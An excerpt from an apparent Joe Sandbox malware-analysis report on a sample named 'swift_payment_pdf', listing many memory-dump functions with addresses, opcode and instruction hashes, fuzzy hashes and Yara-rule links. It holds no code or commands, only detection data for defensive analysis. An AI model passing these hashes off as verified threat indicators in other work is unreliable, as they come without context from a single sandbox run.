                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 79cc1e4a0af0b82dace194afe107b6520b2a9459230c8d51660fd41e397c87b1
                  • Instruction ID: f94b030065836828fd8a69c839668c21e247699783a2e8d21c3a0603b736230a
                  • Opcode Fuzzy Hash: 79cc1e4a0af0b82dace194afe107b6520b2a9459230c8d51660fd41e397c87b1
                  • Instruction Fuzzy Hash: B9419EB2904341AFD760DF29C845B9BBBE8FF88618F004A2EF998C7251D770D905CB92
                  Function 013480A0 Relevance: .1, Instructions: 111COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: ea4b14b49d8d17518bc9a54d9505c2ec04c77220e1858d0d112dd8d528504fe0
                  • Instruction ID: ac8d901e1a2de09b9fcd7999776e651f3eed6173a2f6de42c8879319befaedea
                  • Opcode Fuzzy Hash: ea4b14b49d8d17518bc9a54d9505c2ec04c77220e1858d0d112dd8d528504fe0
                  • Instruction Fuzzy Hash: CA41E171E0561AEFCB01DF9CC880AA9B7F5FF14768F1482AAD816A7680D734FD418B90
                  Function 013D05A7 Relevance: .1, Instructions: 111COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: b4a2ae26ee3abd40048d13be6a01ba0be41e532ffc5b91e1cfa67ccd847f4dfb
                  • Instruction ID: a9d232068bdeef07e28de5e55efa60acd920dc167cd483ca9200deba155ec212
                  • Opcode Fuzzy Hash: b4a2ae26ee3abd40048d13be6a01ba0be41e532ffc5b91e1cfa67ccd847f4dfb
                  • Instruction Fuzzy Hash: D141D6726046419FC324DF6DD880A6AB7E9FFC8B04F14461DF95597680E730D914C7A6
                  Function 01354859 Relevance: .1, Instructions: 111COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: a156158d38e7bdbdae0b713ec9f9ca0b75a92213d4c8df57f23dffb364e2263b
                  • Instruction ID: 34135b83a92b278f5bafcb806393986e884000f81d9c81e685c3cdb12da1d8b6
                  • Opcode Fuzzy Hash: a156158d38e7bdbdae0b713ec9f9ca0b75a92213d4c8df57f23dffb364e2263b
                  • Instruction Fuzzy Hash: C341C3702003028BD769DF2CD885F2ABBF9EF81B58F15442DEE458B2A1EB70D981CB51
                  Function 01348B50 Relevance: .1, Instructions: 111COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 7e4b1f020623fea6b9f1170caeee22c731143b9075a33263189b8e4ee59ff611
                  • Instruction ID: cc22ea08fcb895f08a38886841b56d89455bc72a573f59ff4d6269af70e229bb
                  • Opcode Fuzzy Hash: 7e4b1f020623fea6b9f1170caeee22c731143b9075a33263189b8e4ee59ff611
                  • Instruction Fuzzy Hash: FF419071A01609CFCF15DFADC98099DFBF1FF88328B1086AAD466A7260D734AD41CB40
                  Function 013602E1 Relevance: .1, Instructions: 106COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                  • Instruction ID: 1d7dec6748f7ec26cb381b92a1e9d78bb702835d08b04e3d3fa39cf204fa079a
                  • Opcode Fuzzy Hash: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                  • Instruction Fuzzy Hash: 97311332A00244ABDB228B6CCC84BDBBFECAF14758F1485B5F856D7356D2749984CBA4
                  Function 013FE3DB Relevance: .1, Instructions: 105COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: c61255289ec33317806b44ef79f96a7896bb4d2eda9924549bb3f79c5bd9c162
                  • Instruction ID: cbfe47718b6f519c41d68896ba1bf1547c232dfcd603f95613b8934a8801baac
                  • Opcode Fuzzy Hash: c61255289ec33317806b44ef79f96a7896bb4d2eda9924549bb3f79c5bd9c162
                  • Instruction Fuzzy Hash: E0318A35740756ABDB229F598C41F6B76A9AB58B58F01003CF704BB391DAA4DC01C790
                  Function 01404B4B Relevance: .1, Instructions: 104COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: a5f8c7a54c13e412344d6550e00653e42e7e7906474d5db88a098653b1ff706c
                  • Instruction ID: 3928a28ccf3f8dcb41fb3b3265659134c9b62377eb00bd3cea5fa6d3fad1cd96
                  • Opcode Fuzzy Hash: a5f8c7a54c13e412344d6550e00653e42e7e7906474d5db88a098653b1ff706c
                  • Instruction Fuzzy Hash: AA31B3722056018FC322DF1ED980E26B7F5FB81360F0A447EEA998B3A5D730A801CB91
                  Function 01354260 Relevance: .1, Instructions: 102COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: f00c5ef7acc159cb19914865980566ca2789a0a505043265e025f3fa7608ea9c
                  • Instruction ID: 820ad59672869d6d37098216d9bb7e06acfcf265e35a93e3da166fe9925d236e
                  • Opcode Fuzzy Hash: f00c5ef7acc159cb19914865980566ca2789a0a505043265e025f3fa7608ea9c
                  • Instruction Fuzzy Hash: E041BF35200B459FD76ACF28C581FD77BF8AF45758F008429EA598B760E774E848CB90
                  Function 01404BB0 Relevance: .1, Instructions: 101COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 6443e034806ac559425329349fb9cb4591731b31d425264740df45eee6c4eb6a
                  • Instruction ID: c36460728af5532d979d56fe342483437e563fd63ae7d745c45c6d9a6d29352d
                  • Opcode Fuzzy Hash: 6443e034806ac559425329349fb9cb4591731b31d425264740df45eee6c4eb6a
                  • Instruction Fuzzy Hash: 8E31A1716083018FD321DF2AC980A2AB7E5FB85720F1A457EFA559B3A5D730EC05CB51
                  Function 013CEB1D Relevance: .1, Instructions: 100COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 6ec3e5b2f3e935aa2b06e79520fbe4a8f1110cab5980c1b3adcb1000391ff633
                  • Instruction ID: c90407424356ee4e2409bdf462c38816a4c290b444343b5f461ce44e5c2770fc
                  • Opcode Fuzzy Hash: 6ec3e5b2f3e935aa2b06e79520fbe4a8f1110cab5980c1b3adcb1000391ff633
                  • Instruction Fuzzy Hash: E031B0322096869BF726579CCD58B257FD8BB40F8CF1D40B8AB459B6D2DB28DC40C324
                  Function 014161C3 Relevance: .1, Instructions: 97COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 24a78c4cd9c08ba0f92d3c4eccd02aa04ef913565aab23d237d70da0be62fae7
                  • Instruction ID: 3a02a2c76efc2895da8b2e80815f374d33b0e423eec723e08cd89413cd55e11c
                  • Opcode Fuzzy Hash: 24a78c4cd9c08ba0f92d3c4eccd02aa04ef913565aab23d237d70da0be62fae7
                  • Instruction Fuzzy Hash: A4310475A0011AABDB15DF98CD40BAEB7B9FB44744F014169E900AB258D7B0EC01CB90
                  Function 013F483A Relevance: .1, Instructions: 96COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: e64e55ec3e07b756791b3f072c938ae06365c242037e7e420342abf321f452fa
                  • Instruction ID: 3876ad5896048e04ba12dc3da8068342b9d80867cfe91a6806b098676ad85ef5
                  • Opcode Fuzzy Hash: e64e55ec3e07b756791b3f072c938ae06365c242037e7e420342abf321f452fa
                  • Instruction Fuzzy Hash: 45318536A4012DABCF21DF58DD84BDF7BB9AB98354F1040E5EA08A7250CA30DE91CF90
                  Function 0137EB20 Relevance: .1, Instructions: 96COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 3b0949a13280e208f41a0092e00763121bf48bf5db30ea4b29b42614e1b6da79
                  • Instruction ID: 987240fe94af228a6fe565a2cfcac842f70d5d61a8df08b60bd1cbd6a452a1f0
                  • Opcode Fuzzy Hash: 3b0949a13280e208f41a0092e00763121bf48bf5db30ea4b29b42614e1b6da79
                  • Instruction Fuzzy Hash: 0331A472E04219AFDB31DFADCC40BAEBBBCEF44754F014479E915E7650D6749A008BA0
                  Function 014160B8 Relevance: .1, Instructions: 95COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 5e5d940069eec44283ee920f3cee844592be53f46c40c25b6b2fa854d1a5da72
                  • Instruction ID: 1fc689da0a7db05fb54829d8ff903c164f7460c5120bd6269725b0f2171cfba2
                  • Opcode Fuzzy Hash: 5e5d940069eec44283ee920f3cee844592be53f46c40c25b6b2fa854d1a5da72
                  • Instruction Fuzzy Hash: 24310575B00602EFDB229FADC850B6BBBB9AF44754F16406FE505DB365DAB0DC018B90
                  Function 013507AF Relevance: .1, Instructions: 95COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 60e08257cc2c10d54de2fdb7445878a62075519393b786adb48d93ad4783f0ae
                  • Instruction ID: 763c1c1b259dc703d8a6becd3794d97f6bab43c4e2c874969e6812b480a9847e
                  • Opcode Fuzzy Hash: 60e08257cc2c10d54de2fdb7445878a62075519393b786adb48d93ad4783f0ae
                  • Instruction Fuzzy Hash: 55310532A04616EBCB56DE68C880E6BBFE9EFD4B58F014529FC55A7310DA31DC0187E1
                  Function 01358550 Relevance: .1, Instructions: 94COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: e0bd5a43e1c19ad2b9ff6e386ccabc50d454ecc4dc8bc765e33776cba1b2139c
                  • Instruction ID: 968a89742303e1eb0dcd18adb613f242527837ac6de9f199de6b8c77f29a7763
                  • Opcode Fuzzy Hash: e0bd5a43e1c19ad2b9ff6e386ccabc50d454ecc4dc8bc765e33776cba1b2139c
                  • Instruction Fuzzy Hash: 9D316D71609301CFE760CF19C880B5BBBE5BB98B18F054A6DFE8597651E770E844CB91
                  Function 0138A6C7 Relevance: .1, Instructions: 92COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                  • Instruction ID: edd51afaebb432f7cb415fde2fef599c22a565d4effa98dfb19b793936ce700c
                  • Opcode Fuzzy Hash: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                  • Instruction Fuzzy Hash: 25314DB2B00B01AFD760EFADCD41B57BBF8BB48A54F04052EA59AC3751E630E900DB60
                  Function 013FEBD0 Relevance: .1, Instructions: 91COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: b6b1c44d7013172de8f8c6286fd20b9018363a82fe8f7c874d67a5891df88769
                  • Instruction ID: 82e2e448dba4645d3f4620c4926c2641225bdc14d145e0ce479adda0e7a5cfac
                  • Opcode Fuzzy Hash: b6b1c44d7013172de8f8c6286fd20b9018363a82fe8f7c874d67a5891df88769
                  • Instruction Fuzzy Hash: 163196B15053428FCB21DF1DC540A1ABBF5FF89618F0689BEF5889B221D3309945CB92
                  Function 0137438F Relevance: .1, Instructions: 89COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 8e7ccf7564129c60b3c923cd5f27e7cb7b5d52078faf894811451dab32ea7d41
                  • Instruction ID: 154cf2437afdc1db96eb5c80b22336ea17bae5056b0daf395768c0b9fed84972
                  • Opcode Fuzzy Hash: 8e7ccf7564129c60b3c923cd5f27e7cb7b5d52078faf894811451dab32ea7d41
                  • Instruction Fuzzy Hash: D031C271B002059FD730DFA8C981BAEBBF9BB84308F008529D146E7654E734ED41DB91
                  Function 0134CB7E Relevance: .1, Instructions: 89COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 8cd4161f5b4d08ac4698b36444b06603346f514182f58bb0feca1d395408faf4
                  • Instruction ID: 579efa4559d725c5ec4fa78b96f8bdd768e9983ffdb0401f3d9f35d73554960a
                  • Opcode Fuzzy Hash: 8cd4161f5b4d08ac4698b36444b06603346f514182f58bb0feca1d395408faf4
                  • Instruction Fuzzy Hash: 62210432E0125AABDB109FB98800BBFBBB9EF14744F0580359E15E7380E270DD01C7A4
                  Function 0134C156 Relevance: .1, Instructions: 88COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: ceaaadbe84def59663580fd2b305b9a77888366143a0bc8908374c43d66073ac
                  • Instruction ID: af275ec48cf8989a28f560990d22f4100cc7ed3cb7fa6654e9c1dff96fc33a43
                  • Opcode Fuzzy Hash: ceaaadbe84def59663580fd2b305b9a77888366143a0bc8908374c43d66073ac
                  • Instruction Fuzzy Hash: E13169B15002018BDB35AF5CC841B697BB8EF5031CFC4C1A9ED499B756DA34A882CB90
                  Function 0140C3CD Relevance: .1, Instructions: 88COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                  • Instruction ID: c008772f02da0a67bf5ca5a7bd7141db2749bb4419a3d204d920ca17408a1800
                  • Opcode Fuzzy Hash: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                  • Instruction Fuzzy Hash: 54213B36600652E7CB16AB9A8C40ABBBBB4FF50710F00817FFA55866E2E634D940C360
                  Function 0134E420 Relevance: .1, Instructions: 88COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 5604a1662d2d43cdca49afb777cb72c0eb53454a0745f1a504d4ed5f8e38261a
                  • Instruction ID: 2d1c06c9480f49038012f70af2353f7a1d9606b3dfb865fa04de199f4d06d875
                  • Opcode Fuzzy Hash: 5604a1662d2d43cdca49afb777cb72c0eb53454a0745f1a504d4ed5f8e38261a
                  • Instruction Fuzzy Hash: 1831A231A0152C9BDB319B28CC41FEEB7B9BB15758F0101B1E645A7290D6B8AE818F90
                  Function 01384588 Relevance: .1, Instructions: 87COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                  • Instruction ID: bd5492663c1e2a5ff3907445ae1ceb9454cca7e387ffaea4f68329de5ade6d6f
                  • Opcode Fuzzy Hash: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                  • Instruction Fuzzy Hash: E2217131A0070AEBCB15DF58C980B8EBBB5FF48728F118469EE159F641D675EA05CB90
                  Function 013844B0 Relevance: .1, Instructions: 87COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 7faffa07ed41a55d16d0bf9a336db524accc9d3fdd5fef42c6ed3fb1dfbd43ef
                  • Instruction ID: d5d94f6ee4da71689f45bec6d8f0dca35469542de081397d8ed3406bda24adbf
                  • Opcode Fuzzy Hash: 7faffa07ed41a55d16d0bf9a336db524accc9d3fdd5fef42c6ed3fb1dfbd43ef
                  • Instruction Fuzzy Hash: F121E172604746DBCB22EF18C980B6F77E8FB88728F014519FD489BA40D730E900CBA2
                  Function 0134E388 Relevance: .1, Instructions: 86COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                  • Instruction ID: 38974a8139c0719b3fe7fca709f9b55fa400d0fafc81da740c910f2a3fb9ddc6
                  • Opcode Fuzzy Hash: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                  • Instruction Fuzzy Hash: 62318831600608AFD721CBA9C884F6AB7F9FF45358F1045B9E6529B691E734FE02CB50
                  Function 013CE609 Relevance: .1, Instructions: 86COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 5e1eddf349745fba677f6b0b6598f73cee555d0a153756e46babf9e669e26bbb
                  • Instruction ID: 994771905f7d4a6e07dafe2179ac3be73216fb3fd619cb28f1faa617d6cbabef
                  • Opcode Fuzzy Hash: 5e1eddf349745fba677f6b0b6598f73cee555d0a153756e46babf9e669e26bbb
                  • Instruction Fuzzy Hash: 9F316D75620249EFCB14CF1CC8849AEBBB5FF85728B15446DE8099B391E771EE60CB90
                  Function 013D06F1 Relevance: .1, Instructions: 79COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 6f72feab8e1641724170551945037fda6b68a7a88b12800ed648a4b2b76bfbd9
                  • Instruction ID: a1bb41a8994547be20a3ce5ffca0bed08c03b184acb715150997cee6c96033ca
                  • Opcode Fuzzy Hash: 6f72feab8e1641724170551945037fda6b68a7a88b12800ed648a4b2b76bfbd9
                  • Instruction Fuzzy Hash: F921A072A001299BCF15DF69D881ABEB7F8FF48744F414069F941AB254D738AD42CBA0
                  Function 013D019F Relevance: .1, Instructions: 78COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: fccb888e228a0b0b12a467a9408bb2f672cd451496dacf9b3054240ededbc214
                  • Instruction ID: 14adfb4740a196cd86e8d9ae3a2c95ae44aa172e277d229f3205c1d72468fc38
                  • Opcode Fuzzy Hash: fccb888e228a0b0b12a467a9408bb2f672cd451496dacf9b3054240ededbc214
                  • Instruction Fuzzy Hash: 2221BC72600605AFDB15DB6CD840F6AB7B8FF98748F144069F908DB6A0D634ED00CB68
                  Function 013D0283 Relevance: .1, Instructions: 74COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 86bb1999e2c3edb66fb9d5d910bdeaff91f60a3e1e4e0280a62c8efa444f1924
                  • Instruction ID: c3fe8f4a73468a7bd9ea592941db92e6fa6d27363fa78a32ea0738586efdacc1
                  • Opcode Fuzzy Hash: 86bb1999e2c3edb66fb9d5d910bdeaff91f60a3e1e4e0280a62c8efa444f1924
                  • Instruction Fuzzy Hash: 5D2125735043469FD716EF9DE808B5BBBECAF90A48F084856BD84C7251DB34D908C6A2
                  Function 01372835 Relevance: .1, Instructions: 73COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 90419837d0e0441169893484379a78241af1199a84cdb9a40a405931007457c2
                  • Instruction ID: 808557143d5c119b6c282aa6fe65ce1d051cafa256e82ec7530c664b51ba3770
                  • Opcode Fuzzy Hash: 90419837d0e0441169893484379a78241af1199a84cdb9a40a405931007457c2
                  • Instruction Fuzzy Hash: 6121FC31705AC5ABE332576C8C54B557F98AF41B7CF180368FB209BAE2E76DD8018154
                  Function 0138A30B Relevance: .1, Instructions: 70COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: f2c827b300f6f53794eb0fd2406386d5c16c3b46a4ef65afd57d68791fd916a9
                  • Instruction ID: 00cf9f4eb81f3b770b401c034b09fd60e399c13b128fd516cb2784e0e28a1358
                  • Opcode Fuzzy Hash: f2c827b300f6f53794eb0fd2406386d5c16c3b46a4ef65afd57d68791fd916a9
                  • Instruction Fuzzy Hash: 96219879200B01ABCB25DF29C801B46B7E9AF58B08F24846DA509CBB65E371E842CB94
                  Function 0140A49A Relevance: .1, Instructions: 70COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: f536b8966cd68f60af86d63d6ec46338c47ecab39db3becbd7dba5b3c7b841a5
                  • Instruction ID: 25411528df5757d88259cd384d031752135ad6dab914531f1fb840699cf97f59
                  • Opcode Fuzzy Hash: f536b8966cd68f60af86d63d6ec46338c47ecab39db3becbd7dba5b3c7b841a5
                  • Instruction Fuzzy Hash: 7F11C173280B11BBE7235A5A9C01F677699ABD4B60F714039BB189B2E0EBB1DC018695
                  Function 013D0946 Relevance: .1, Instructions: 70COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: fc21a8e440fbf655c60cd51320ac6e6427aa5b653ba807efcfcd1944e501a656
